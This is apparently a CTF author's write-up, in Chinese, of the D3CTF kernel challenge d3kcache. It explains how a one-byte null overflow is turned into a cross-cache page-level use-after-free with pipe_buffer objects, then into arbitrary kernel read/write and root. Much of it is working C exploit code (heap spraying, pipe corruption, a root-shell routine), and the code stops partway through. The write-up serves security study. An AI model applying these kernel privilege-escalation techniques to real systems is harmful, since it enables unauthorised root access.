本文最后更新于：2023年12月18日早上

「さらば、全てのリヌクスカーネルエクスプロイテーション。」

0x00.一切开始之前

都是废话，可以不用看（笑）

不出意外的话这应该是笔者本科阶段最后一次出 D3CTF 的题目了，虽然说笔者一直想整一些好活，但是鉴于笔者实在是太菜了所以一直没能出过特别优秀的题目：）

笔者一直在想，作为一名黑客，在剥离去各种不同的题目结构、漏洞环境的背后，我们究竟能在多么极端的情况下完成对一个漏洞的利用？我们是否能够脱离实验室的理想环境实现一种足以应用在实战中的通解？

Google 在 CVE-2021-22555 当中向我们展示了一个普通的堆上 2 字节溢出如何变成堆溢出& UAF 通杀解法，BitsByWill 在 corCTF 2022 中向我们展示了利用页级内核堆风水打破不同 caches 间的阻隔，D3v17 则仅利用一个 '\0' 字节的堆溢出便完成了内核提权，Kylebot 更是将这一个 '\0' 字节的堆溢出转成了 cross-cache overflow 完成利用，那么再更进一步呢——

如果漏洞所在结构体大小不够合适/结构体自身无法帮助我们完成利用，我们只能借助 msg_msg 等结构体去适配大小，但这类结构体较为稀有且存在诸多限制（例如往往带有一个 header）
如果漏洞存在于一个独立的 kmem_cache 当中，我们无法借助其他的内核结构体完成利用，只能考虑转化为 cross-cache overflow
如果漏洞仅有 1 字节的溢出，我们无法利用页级堆风水转成利用 Google 的通杀 exp ，又或是禁用了 System V 消息队列无法利用多级 msg_msg 构造 UAF，我们便只能考虑其他的方案
如果系统内存较小，或是 modprobe_path 为静态值，Kylebot 的 unlink attack 将无法发挥作用，我们只好考虑 D3v17 的 poll_list 任意释放
如果漏洞所在结构体大小不够合适，我们只能进行更加细粒度的页级堆风水，而不同 order 间的风水会使得成功率大打折扣
如果内核开启了 Control Flow Integrity，又或者我们甚至都不知道内核镜像信息，那么传统的 ROP 方法基本宣告死亡

在这样极端的情况下，我们是否还仍能够找到一种通法来完成对内核漏洞的利用？——这便是笔者在出这道题时最初的想法：）

0x01.题目分析

题目逆向起来应该还是比较简单的，在模块初始化函数中创建了一个独立的 kmem_cache ，对象大小为 2048：

#define KCACHE_SIZE 2048

static int d3kcache_module_init(void)
{
    //...

    kcache_jar = kmem_cache_create_usercopy("kcache_jar", KCACHE_SIZE, 0, 
                         SLAB_HWCACHE_ALIGN | SLAB_PANIC | SLAB_ACCOUNT, 
                         0, KCACHE_SIZE, NULL);

    memset(kcache_list, 0, sizeof(kcache_list));

    return 0;
}

自定义的 ioctl 函数提供了分配、追加编辑、释放、读取的一个堆菜单，漏洞便出在追加编辑当中，当写满 2048 字节时存在着一个 \0 字节的溢出：

long d3kcache_ioctl(struct file *__file, unsigned int cmd, unsigned long param)
{
    //...

    switch (cmd) {
        //...
        case KCACHE_APPEND:
            if (usr_cmd.idx < 0 || usr_cmd.idx >= KCACHE_NUM 
                || !kcache_list[usr_cmd.idx].buf) {
                printk(KERN_ALERT "[d3kcache:] Invalid index to write.");
                break;
            }

            if (usr_cmd.sz > KCACHE_SIZE || 
                (usr_cmd.sz + kcache_list[usr_cmd.idx].size) >= KCACHE_SIZE) {
                size = KCACHE_SIZE - kcache_list[usr_cmd.idx].size;
            } else {
                size = usr_cmd.sz;
            }

            kcache_buf = kcache_list[usr_cmd.idx].buf;
            kcache_buf += kcache_list[usr_cmd.idx].size;

            if (copy_from_user(kcache_buf, usr_cmd.buf, size)) {
                break;
            }

            kcache_buf[size] = '\0'; /* 漏洞点 */

            retval = 0;
            break;
            //...

同时查看题目所提供的内核编译文件，可以发现开启了 Control Flow Integrity 保护：

1	`CONFIG_CFI_CLANG=y`

其他的各种常规保护（KPTI、KASLR、Hardened Usercopy、…）基本上都是开启的，这里就不阐述了

当然，做内核漏洞利用自然要默认这些保护都开了：）

0x02.漏洞利用

由于题目所在的 kmem_cache 为一个独立的 kmem_cache ，因此我们只能考虑 cross-cache overflow：溢出到其他结构体所在页面上完成利用

毕竟你总不能指望在 freelist 相关保护都开启的情况下 free object 的 next 指针刚好在前 8 字节然后覆写又刚好能把 freelist 劫持到有效可控地址上：）

Step.I - 页级堆风水构造稳定跨页溢出布局

为了保证溢出的稳定性，这里笔者使用页级堆风水的方法来构造预溢出布局

基本原理

页级堆风水是一种其实不算新但是其实还是稍微有点新的利用手法，顾名思义，页级堆风水即以内存页为粒度的内存排布方式，而内核内存页的排布对我们来说不仅未知且信息量巨大，因此这种利用手法实际上是让我们手工构造一个新的已知的页级粒度内存页排布

首先让我们重新审视 slub allocator 向 buddy system 请求页面的过程，当 freelist page 已经耗空且 partial 链表也为空时（或者 kmem_cache 刚刚创建后进行第一次分配时），其会向 buddy system 申请页面：

接下来让我们重新审视 buddy system ，其基本原理就是以 2 的 order 次幂张内存页作为分配粒度，相同 order 间空闲页面构成双向链表，当低阶 order 的页面不够用时便会从高阶 order 取一份连续内存页拆成两半，其中一半挂回当前请求 order 链表，另一半返还给上层调用者；下图为以 order 2 为例的 buddy system 页面分配基本原理：

我们不难想到的是：从更高阶 order 拆分成的两份低阶 order 的连续内存页是物理连续的，由此我们可以：

向 buddy system 请求两份连续的内存页
释放其中一份内存页，在 vulnerable kmem_cache 上堆喷，让其取走这份内存页
释放另一份内存页，在 victim kmem_cache 上堆喷，让其取走这份内存页

此时我们便有可能溢出到其他的内核结构体上，从而完成 cross-cache overflow

具体利用

在内核当中有着很多的可以直接向 buddy system 请求页面的 API，这里笔者选用一个来自于 CVE-2017-7308 的方案：

当我们创建一个 protocol 为 PF_PACKET 的 socket 之后，先调用 setsockopt() 将 PACKET_VERSION 设为 TPACKET_V1 / TPACKET_V2，再调用 setsockopt() 提交一个 PACKET_TX_RING ，此时便存在如下调用链：

__sys_setsockopt()
    sock->ops->setsockopt()
    	packet_setsockopt() // case PACKET_TX_RING ↓
    		packet_set_ring()
    			alloc_pg_vec()

在 alloc_pg_vec() 中会创建一个 pgv 结构体，用以分配 tp_block_nr 份 2^order 张内存页，其中 order 由 tp_block_size 决定：

static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
{
	unsigned int block_nr = req->tp_block_nr;
	struct pgv *pg_vec;
	int i;

	pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN);
	if (unlikely(!pg_vec))
		goto out;

	for (i = 0; i < block_nr; i++) {
		pg_vec[i].buffer = alloc_one_pg_vec_page(order);
		if (unlikely(!pg_vec[i].buffer))
			goto out_free_pgvec;
	}

out:
	return pg_vec;

out_free_pgvec:
	free_pg_vec(pg_vec, order, block_nr);
	pg_vec = NULL;
	goto out;
}

在 alloc_one_pg_vec_page() 中会直接调用 __get_free_pages() 向 buddy system 请求内存页，因此我们可以利用该函数进行大量的页面请求：

static char *alloc_one_pg_vec_page(unsigned long order)
{
	char *buffer;
	gfp_t gfp_flags = GFP_KERNEL | __GFP_COMP |
			  __GFP_ZERO | __GFP_NOWARN | __GFP_NORETRY;

	buffer = (char *) __get_free_pages(gfp_flags, order);
	if (buffer)
		return buffer;
	//...
}

相应地， pgv 中的页面也会在 socket 被关闭后释放：

1
2
3

packet_release()
    packet_set_ring()
    	free_pg_vec()

setsockopt() 也可以帮助我们完成页级堆风水，当我们耗尽 buddy system 中的 low order pages 后，我们再请求的页面便都是物理连续的，因此此时我们再进行 setsockopt() 便相当于获取到了一块近乎物理连续的内存（为什么是”近乎连续“是因为大量的 setsockopt() 流程中同样会分配大量我们不需要的结构体，从而消耗 buddy system 的部分页面）

由此，我们可以获得对一块连续内存的页级掌控，从而可以这样构造出如下图所示堆布局：

先释放一部分页面，让 victim object 取得这些页面
释放一份页面，向题目模块请求分配对象，从而获得该份页面
再释放一部分页面，让 victim object 取得这些页面

这样题目所在的页面便会被夹在 victim 对象的页面中间，使得溢出的稳定性大幅增加

Step.II - fcntl(F_SETPIPE_SZ) 更改 pipe_buffer 所在 slub 大小，跨页溢出构造页级 UAF

接下来我们考虑溢出的目标对象，相信大家最先想到的应该是万能结构体 msg_msg ，但是在笔者看来这个结构体 仍旧不够强大 ，而且在过去的各种漏洞利用当中我们未免也太依赖于 msg_msg 了，所以笔者想要探索一些新的方法：）

猪猪侠，你太依赖超级棒棒糖了.png

由于仅有一个字节的溢出，毫无疑问的是我们需要寻找一些在结构体头部便有指向其他内核对象的指针的内核对象，我们不难想到的是 pipe_buffer 是一个非常好的的利用对象，其开头有着指向 page 结构体的指针，而 page 的大小仅为 0x40 ，可以被 0x100 整除，若我们能够通过 partial overwrite 使得两个管道指向同一张页面，并释放掉其中一个，我们便构造出了页级的 UAF：

original state

null-byte partial overwrite

page-level UAF

同时管道的特性还能让我们在 UAF 页面上任意读写，这真是再美妙不过了：）

但是有一个小问题，pipe_buffer 来自于 kmalloc-cg-1k ，其会请求 order-2 的页面，而题目模块的对象大小为 2k，其会请求 order-3 的页面，如果我们直接进行不同 order 间的堆风水的话，则利用成功率会大打折扣 :（

但 pipe 可以被挖掘的潜力远比我们想象中大得多：）现在让我们重新审视 pipe_buffer 的分配过程，其实际上是单次分配 pipe_bufs 个 pipe_buffer 结构体：

struct pipe_inode_info *alloc_pipe_info(void)
{
	//...

	pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
			     GFP_KERNEL_ACCOUNT);

这里注意到 pipe_buffer 不是一个常量而是一个变量，那么我们能否有方法修改 pipe_buffer 的数量？答案是肯定的，pipe 系统调用非常贴心地为我们提供了 F_SETPIPE_SZ 让我们可以重新分配 pipe_buffer 并指定其数量：

long pipe_fcntl(struct file *file, unsigned int cmd, unsigned long arg)
{
	struct pipe_inode_info *pipe;
	long ret;

	pipe = get_pipe_info(file, false);
	if (!pipe)
		return -EBADF;

	__pipe_lock(pipe);

	switch (cmd) {
	case F_SETPIPE_SZ:
		ret = pipe_set_size(pipe, arg);
//...

static long pipe_set_size(struct pipe_inode_info *pipe, unsigned long arg)
{
	//...

	ret = pipe_resize_ring(pipe, nr_slots);

//...

int pipe_resize_ring(struct pipe_inode_info *pipe, unsigned int nr_slots)
{
	struct pipe_buffer *bufs;
	unsigned int head, tail, mask, n;

	bufs = kcalloc(nr_slots, sizeof(*bufs),
		       GFP_KERNEL_ACCOUNT | __GFP_NOWARN);

那么我们不难想到的是我们可以通过 fcntl() 重新分配单个 pipe 的 pipe_buffer 数量，：

对于每个 pipe 我们指定分配 64 个 pipe_buffer，从而使其向 kmalloc-cg-2k 请求对象，而这将最终向 buddy system 请求 order-3 的页面

由此，我们便成功使得 pipe_buffer 与题目模块的对象处在同一 order 的内存页上，从而提高 cross-cache overflow 的成功率

不过需要注意的是，由于 page 结构体的大小为 0x40，其可以被 0x100 整除，因此若我们所溢出的目标 page 的地址最后一个字节刚好为 \x00， 那就等效于没有溢出 ，因此实际上利用成功率仅为 75% （悲）

Step.III - 构造二级自写管道，实现任意内存读写

有了 page-level UAF，我们接下来考虑向这张页面分配什么结构体作为下一阶段的 victim object

由于管道本身便提供给我们读写的功能，而我们又能够调整 pipe_buffer 的大小并重新分配结构体，那么再次选择 pipe_buffer 作为 victim object 便是再自然不过的事情：）

接下来我们可以通过 UAF 管道读取 pipe_buffer 内容，从而泄露出 page、pipe_buf_operations 等有用的数据（可以在重分配前预先向管道中写入一定长度的内容，从而实现数据读取），由于我们可以通过 UAF 管道直接改写 pipe_buffer ，因此将漏洞转化为 dirty pipe 或许会是一个不错的办法（这也是本次比赛中 NU1L 战队的解法）

但是 pipe 的强大之处远不止这些，由于我们可以对 UAF 页面上的 pipe_buffer 进行读写，我们可以继续构造出第二级的 page-level UAF：

secondary page-level UAF

为什么要这么做呢？在第一次 UAF 时我们获取到了 page 结构体的地址，而 page 结构体的大小固定为 0x40，且与物理内存页一一对应，试想若是我们可以不断地修改一个 pipe 的 page 指针，则我们便能完成对整个内存空间的任意读写，因此接下来我们要完成这样的一个利用系统的构造

再次重新分配 pipe_buffer 结构体到第二级 page-level UAF 页面上，由于这张物理页面对应的 page 结构体的地址对我们而言是已知的，我们可以直接让这张页面上的 pipe_buffer 的 page 指针指向自身，从而直接完成对自身的修改：

third-level self-pointing pipe

这里我们可以篡改 pipe_buffer.offset 与 pipe_buffer.len 来移动 pipe 的读写起始位置，从而实现无限循环的读写，但是这两个变量会在完成读写操作后重新被赋值，因此这里我们使用三个管道：

第一个管道用以进行内存空间中的任意读写，我们通过修改其 page 指针完成：）
第二个管道用以修改第三个管道，使其写入的起始位置指向第一个管道
第三个管道用以修改第一个与第二个管道，使得第一个管道的 pipe 指针指向指定位置、第二个管道的写入起始位置指向第三个管道

通过这三个管道之间互相循环修改，我们便实现了一个可以在内存空间中进行近乎无限制的任意读写系统 ：）

Step.IV - 提权

有了内存空间中的任意读写，提权便是非常简便的一件事情了，这里笔者给出三种提权方法：）

方法一、修改当前进程的 task_struct 的 cred 为 init_cred

init_cred 为有着 root 权限的 cred，我们可以直接将当前进程的 cred 修改为该 cred 以完成提权，这里iwom可以通过 prctl(PR_SET_NAME, "arttnba3pwnn"); 修改 task_struct.comm ，从而方便搜索当前进程的 task_struct 在内存空间中的位置：）

不过 init_cred 的符号有的时候是不在 /proc/kallsyms 中导出的，我们在调试时未必能够获得其地址，因此这里笔者选择通过解析 task_struct 的方式向上一直找到 init 进程（所有进程的父进程）的 task_struct ，从而获得 init_cred 的地址：

方法二、内核页表解析获取内核栈物理地址，利用直接映射区覆写内核栈完成 ROP

开启了 CFI 并不代表我们便不能够在内核空间中进行任意代码执行了，作为一名黑客没有什么是不可能的，所因此我们仍然要进行任意代码执行：）（←有点中二的一个人

由于 page 结构体数组与物理内存页一一对应的缘故，我们可以很轻易地在物理地址与 page 结构体地址间进行转换，而在页表当中存放的是物理地址，我们不难想到的是我们可以通过解析当前进程的页表来获取到内核栈的物理地址，从而获取到内核栈对应的 page，之后我们可以直接向内核栈上写 ROP chain 来完成任意代码执行

页表的地址可以通过 mm_struct 获取， mm_struct 地址可以通过 task_struct 获取，内核栈地址同样可以通过 task_struct 获取，那么这一切其实是水到渠成的事情：

但这种方法有一个缺陷，我们会有一定概率没法直接写到当前进程的内核栈上（也不知道写哪去了），从而导致 ROP 失败，原因不明

笔者暂时没有发现整个过程的原理存在缺陷的地方，甚至尝试多次重新解析页表（得到的内核栈地址不变）然后写入数据后仍旧无事发生，也不知道究竟是哪出了问题：(

方法三、内核页表解析获取代码段物理地址，改写内核页表建立新映射实现 USMA

既然我们能够进行内存空间中的任意读写，直接改写内核代码段也是一个实现任意代码执行的好办法，但是直接映射区对应的内核代码段区域没有可写入权限，直接写会导致 kernel panic :（

但是改写内核代码段本质上便是向对应的物理页写入数据，而我们又能够读写进程页表，我们直接在用户空间建立一个到内核代码段对应物理内存的映射就能改写内核代码段了：）

方便起见，我们可以先通过 mmap() 随便映射一块内存，之后改写 mmap() 的虚拟地址在页表中对应的物理地址即可，这种方法本质上其实就是用户态映射攻击：

Final Exploitation

最终的完整 exp 如下，同时包含笔者所给出的三种提权手段的代码：

由于 page 结构体地址可能出现末字节为 \x00 的情况，故成功几率仅有 75% （悲）

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sched.h>
#include <sys/prctl.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/mman.h>

/**
 * I - fundamental functions
 * e.g. CPU-core binder, user-status saver, etc.
 */

size_t kernel_base = 0xffffffff81000000, kernel_offset = 0;
size_t page_offset_base = 0xffff888000000000, vmemmap_base = 0xffffea0000000000;
size_t init_task, init_nsproxy, init_cred;

size_t direct_map_addr_to_page_addr(size_t direct_map_addr)
{
    size_t page_count;

    page_count = ((direct_map_addr & (~0xfff)) - page_offset_base) / 0x1000;
    
    return vmemmap_base + page_count * 0x40;
}

void err_exit(char *msg)
{
    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    sleep(5);
    exit(EXIT_FAILURE);
}

/* root checker and shell poper */
void get_root_shell(void)
{
    if(getuid()) {
        puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
        sleep(5);
        exit(EXIT_FAILURE);
    }

    puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
    puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");
    
    system("/bin/sh");
    
    /* to exit the process normally, instead of segmentation fault */
    exit(EXIT_SUCCESS);
}

/* userspace status saver */
size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            );
    printf("\033[34m\033[1m[*] Status has been saved.\033[0m\n");
}

/* bind the process to specific core */
void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

/**
 * @brief create an isolate namespace
 * note that the caller **SHOULD NOT** be used to get the root, but an operator
 * to perform basic exploiting operations in it only
 */
void unshare_setup(void)
{
    char edit[0x100];
    int tmp_fd;

    unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET);

    tmp_fd = open("/proc/self/setgroups", O_WRONLY);
    write(tmp_fd, "deny", strlen("deny"));
    close(tmp_fd);

    tmp_fd = open("/proc/self/uid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", getuid());
    write(tmp_fd, edit, strlen(edit));
    close(tmp_fd);

    tmp_fd = open("/proc/self/gid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", getgid());
    write(tmp_fd, edit, strlen(edit));
    close(tmp_fd);
}

struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

/* read start from len to offset, write start from offset */
struct pipe_buffer {
	struct page *page;
	unsigned int offset, len;
	const struct pipe_buf_operations *ops;
	unsigned int flags;
	unsigned long private;
};

struct pipe_buf_operations {
	/*
	 * ->confirm() verifies that the data in the pipe buffer is there
	 * and that the contents are good. If the pages in the pipe belong
	 * to a file system, we may need to wait for IO completion in this
	 * hook. Returns 0 for good, or a negative error value in case of
	 * error.  If not present all pages are considered good.
	 */
	int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);

	/*
	 * When the contents of this pipe buffer has been completely
	 * consumed by a reader, ->release() is called.
	 */
	void (*release)(struct pipe_inode_info *, struct pipe_buffer *);

	/*
	 * Attempt to take ownership of the pipe buffer and its contents.
	 * ->try_steal() returns %true for success, in which case the contents
	 * of the pipe (the buf->page) is locked and now completely owned by the
	 * caller. The page may then be transferred to a different mapping, the
	 * most often used case is insertion into different file address space
	 * cache.
	 */
	int (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);

	/*
	 * Get a reference to the pipe buffer.
	 */
	int (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};

/**
 * II - interface to interact with /dev/kcache
 */
#define KCACHE_SIZE 2048
#define KCACHE_NUM 0x10

#define KCACHE_ALLOC 0x114
#define KCACHE_APPEND 0x514
#define KCACHE_READ 0x1919
#define KCACHE_FREE 0x810

struct kcache_cmd {
    int idx;
    unsigned int sz;
    void *buf;
};

int dev_fd;

int kcache_alloc(int index, unsigned int size, char *buf)
{
    struct kcache_cmd cmd = {
        .idx = index,
        .sz = size,
        .buf = buf,
    };

    return ioctl(dev_fd, KCACHE_ALLOC, &cmd);
}

int kcache_append(int index, unsigned int size, char *buf)
{
    struct kcache_cmd cmd = {
        .idx = index,
        .sz = size,
        .buf = buf,
    };

    return ioctl(dev_fd, KCACHE_APPEND, &cmd);
}

int kcache_read(int index, unsigned int size, char *buf)
{
    struct kcache_cmd cmd = {
        .idx = index,
        .sz = size,
        .buf = buf,
    };

    return ioctl(dev_fd, KCACHE_READ, &cmd);
}

int kcache_free(int index)
{
    struct kcache_cmd cmd = {
        .idx = index,
    };

    return ioctl(dev_fd, KCACHE_FREE, &cmd);
}

/**
 * III -  pgv pages sprayer related 
 * not that we should create two process:
 * - the parent is the one to send cmd and get root
 * - the child creates an isolate userspace by calling unshare_setup(),
 *      receiving cmd from parent and operates it only
 */
#define PGV_PAGE_NUM 1000
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

struct tpacket_req {
    unsigned int tp_block_size;
    unsigned int tp_block_nr;
    unsigned int tp_frame_size;
    unsigned int tp_frame_nr;
};

/* each allocation is (size * nr) bytes, aligned to PAGE_SIZE */
struct pgv_page_request {
    int idx;
    int cmd;
    unsigned int size;
    unsigned int nr;
};

/* operations type */
enum {
    CMD_ALLOC_PAGE,
    CMD_FREE_PAGE,
    CMD_EXIT,
};

/* tpacket version for setsockopt */
enum tpacket_versions {
    TPACKET_V1,
    TPACKET_V2,
    TPACKET_V3,
};

/* pipe for cmd communication */
int cmd_pipe_req[2], cmd_pipe_reply[2];

/* create a socket and alloc pages, return the socket fd */
int create_socket_and_alloc_pages(unsigned int size, unsigned int nr)
{
    struct tpacket_req req;
    int socket_fd, version;
    int ret;

    socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
    if (socket_fd < 0) {
        printf("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n");
        ret = socket_fd;
        goto err_out;
    }

    version = TPACKET_V1;
    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION, 
                     &version, sizeof(version));
    if (ret < 0) {
        printf("[x] failed at setsockopt(PACKET_VERSION)\n");
        goto err_setsockopt;
    }

    memset(&req, 0, sizeof(req));
    req.tp_block_size = size;
    req.tp_block_nr = nr;
    req.tp_frame_size = 0x1000;
    req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
    if (ret < 0) {
        printf("[x] failed at setsockopt(PACKET_TX_RING)\n");
        goto err_setsockopt;
    }

    return socket_fd;

err_setsockopt:
    close(socket_fd);
err_out:
    return ret;
}

/* the parent process should call it to send command of allocation to child */
int alloc_page(int idx, unsigned int size, unsigned int nr)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = CMD_ALLOC_PAGE,
        .size = size,
        .nr = nr,
    };
    int ret;

    write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
    read(cmd_pipe_reply[0], &ret, sizeof(ret));

    return ret;
}

/* the parent process should call it to send command of freeing to child */
int free_page(int idx)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = CMD_FREE_PAGE,
    };
    int ret;

    write(cmd_pipe_req[1], &req, sizeof(req));
    read(cmd_pipe_reply[0], &ret, sizeof(ret));

    usleep(10000);

    return ret;
}

/* the child, handler for commands from the pipe */
void spray_cmd_handler(void)
{
    struct pgv_page_request req;
    int socket_fd[PGV_PAGE_NUM];
    int ret;

    /* create an isolate namespace*/
    unshare_setup();

    /* handler request */
    do {
        read(cmd_pipe_req[0], &req, sizeof(req));

        if (req.cmd == CMD_ALLOC_PAGE) {
            ret = create_socket_and_alloc_pages(req.size, req.nr);
            socket_fd[req.idx] = ret;
        } else if (req.cmd == CMD_FREE_PAGE) {
            ret = close(socket_fd[req.idx]);
        } else {
            printf("[x] invalid request: %d\n", req.cmd);
        }

        write(cmd_pipe_reply[1], &ret, sizeof(ret));
    } while (req.cmd != CMD_EXIT);
}

/* init pgv-exploit subsystem :) */
void prepare_pgv_system(void)
{
    /* pipe for pgv */
    pipe(cmd_pipe_req);
    pipe(cmd_pipe_reply);
    
    /* child process for pages spray */
    if (!fork()) {
        spray_cmd_handler();
    }
}

/**
 * IV - config for page-level heap spray and heap fengshui
 */
#define PIPE_SPRAY_NUM 200

#define PGV_1PAGE_SPRAY_NUM 0x20

#define PGV_4PAGES_START_IDX PGV_1PAGE_SPRAY_NUM
#define PGV_4PAGES_SPRAY_NUM 0x40

#define PGV_8PAGES_START_IDX (PGV_4PAGES_START_IDX + PGV_4PAGES_SPRAY_NUM)
#define PGV_8PAGES_SPRAY_NUM 0x40

int pgv_1page_start_idx = 0;
int pgv_4pages_start_idx = PGV_4PAGES_START_IDX;
int pgv_8pages_start_idx = PGV_8PAGES_START_IDX;

/* spray pages in different size for various usages */
void prepare_pgv_pages(void)
{
    /**
     * We want a more clear and continuous memory there, which require us to 
     * make the noise less in allocating order-3 pages.
     * So we pre-allocate the pages for those noisy objects there.
     */
    puts("[*] spray pgv order-0 pages...");
    for (int i = 0; i < PGV_1PAGE_SPRAY_NUM; i++) {
        if (alloc_page(i, 0x1000, 1) < 0) {
            printf("[x] failed to create %d socket for pages spraying!\n", i);
        }
    }

    puts("[*] spray pgv order-2 pages...");
    for (int i = 0; i < PGV_4PAGES_SPRAY_NUM; i++) {
        if (alloc_page(PGV_4PAGES_START_IDX + i, 0x1000 * 4, 1) < 0) {
            printf("[x] failed to create %d socket for pages spraying!\n", i);
        }
    }

    /* spray 8 pages for page-level heap fengshui */
    puts("[*] spray pgv order-3 pages...");
    for (int i = 0; i < PGV_8PAGES_SPRAY_NUM; i++) {
        /* a socket need 1 obj: sock_inode_cache, 19 objs for 1 slub on 4 page*/
        if (i % 19 == 0) {
            free_page(pgv_4pages_start_idx++);
        }

        /* a socket need 1 dentry: dentry, 21 objs for 1 slub on 1 page */
        if (i % 21 == 0) {
            free_page(pgv_1page_start_idx += 2);
        }

        /* a pgv need 1 obj: kmalloc-8, 512 objs for 1 slub on 1 page*/
        if (i % 512 == 0) {
            free_page(pgv_1page_start_idx += 2);
        }

        if (alloc_page(PGV_8PAGES_START_IDX + i, 0x1000 * 8, 1) < 0) {
            printf("[x] failed to create %d socket for pages spraying!\n", i);
        }
    }

    puts("");
}

/* for pipe escalation */
#define SND_PIPE_BUF_SZ 96
#define TRD_PIPE_BUF_SZ 192

int pipe_fd[PIPE_SPRAY_NUM][2];
int orig_pid = -1, victim_pid = -1;
int snd_orig_pid = -1, snd_vicitm_pid = -1;
int self_2nd_pipe_pid = -1, self_3rd_pipe_pid = -1, self_4th_pipe_pid = -1;

struct pipe_buffer info_pipe_buf;

int extend_pipe_buffer_to_4k(int start_idx, int nr)
{
    for (int i = 0; i < nr; i++) {
        /* let the pipe_buffer to be allocated on order-3 pages (kmalloc-4k) */
        if (i % 8 == 0) {
            free_page(pgv_8pages_start_idx++);
        }

        /* a pipe_buffer on 1k is for 16 pages, so 4k for 64 pages */
        if (fcntl(pipe_fd[start_idx + i][1], F_SETPIPE_SZ, 0x1000 * 64) < 0) {
            printf("[x] failed to extend %d pipe!\n", start_idx + i);
            return -1;
        }
    }

    return 0;
}

/**
 *  V - FIRST exploit stage - cross-cache overflow to make page-level UAF
*/

void corrupting_first_level_pipe_for_page_uaf(void)
{
    char buf[0x1000];

    puts("[*] spray pipe_buffer...");
    for (int i = 0; i < PIPE_SPRAY_NUM; i ++) {

        if (pipe(pipe_fd[i]) < 0) {
            printf("[x] failed to alloc %d pipe!", i);
            err_exit("FAILED to create pipe!");
        }
    }

    /* spray pipe_buffer on order-2 pages, make vul-obj slub around with that.*/

    puts("[*] exetend pipe_buffer...");
    if (extend_pipe_buffer_to_4k(0, PIPE_SPRAY_NUM / 2) < 0) {
        err_exit("FAILED to extend pipe!");
    }

    puts("[*] spray vulnerable 2k obj...");
    free_page(pgv_8pages_start_idx++);
    for (int i = 0; i < KCACHE_NUM; i++) {
        kcache_alloc(i, 8, "arttnba3");
    }

    puts("[*] exetend pipe_buffer...");
    if (extend_pipe_buffer_to_4k(PIPE_SPRAY_NUM / 2, PIPE_SPRAY_NUM / 2) < 0) {
        err_exit("FAILED to extend pipe!");
    }

    puts("[*] allocating pipe pages...");
    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
        write(pipe_fd[i][1], "arttnba3", 8);
        write(pipe_fd[i][1], &i, sizeof(int));
        write(pipe_fd[i][1], &i, sizeof(int));
        write(pipe_fd[i][1], &i, sizeof(int));
        write(pipe_fd[i][1], "arttnba3", 8);
        write(pipe_fd[i][1], "arttnba3", 8);  /* prevent pipe_release() */
    }

    /* try to trigger cross-cache overflow */
    puts("[*] trigerring cross-cache off-by-null...");
    for (int i = 0; i < KCACHE_NUM; i++) {
        kcache_append(i, KCACHE_SIZE - 8, buf);
    }

    /* checking for cross-cache overflow */
    puts("[*] checking for corruption...");
    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
        char a3_str[0x10];
        int nr;

        memset(a3_str, '\0', sizeof(a3_str));
        read(pipe_fd[i][0], a3_str, 8);
        read(pipe_fd[i][0], &nr, sizeof(int));
        if (!strcmp(a3_str, "arttnba3") && nr != i) {
            orig_pid = nr;
            victim_pid = i;
            printf("\033[32m\033[1m[+] Found victim: \033[0m%d "
                   "\033[32m\033[1m, orig: \033[0m%d\n\n", 
                   victim_pid, orig_pid);
            break;
        }
    }

    if (victim_pid == -1) {
        err_exit("FAILED to corrupt pipe_buffer!");
    }
}

void corrupting_second_level_pipe_for_pipe_uaf(void)
{
    size_t buf[0x1000];
    size_t snd_pipe_sz = 0x1000 * (SND_PIPE_BUF_SZ/sizeof(struct pipe_buffer));

    memset(buf, '\0', sizeof(buf));

    /* let the page's ptr at pipe_buffer */
    write(pipe_fd[victim_pid][1], buf, SND_PIPE_BUF_SZ*2 - 24 - 3*sizeof(int));

    /* free orignal pipe's page */
    puts("[*] free original pipe...");
    close(pipe_fd[orig_pid][0]);
    close(pipe_fd[orig_pid][1]);

    /* try to rehit victim page by reallocating pipe_buffer */
    puts("[*] fcntl() to set the pipe_buffer on victim page...");
    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
        if (i == orig_pid || i == victim_pid) {
            continue;
        }

        if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, snd_pipe_sz) < 0) {
            printf("[x] failed to resize %d pipe!\n", i);
            err_exit("FAILED to re-alloc pipe_buffer!");
        }
    }

    /* read victim page to check whether we've successfully hit it */
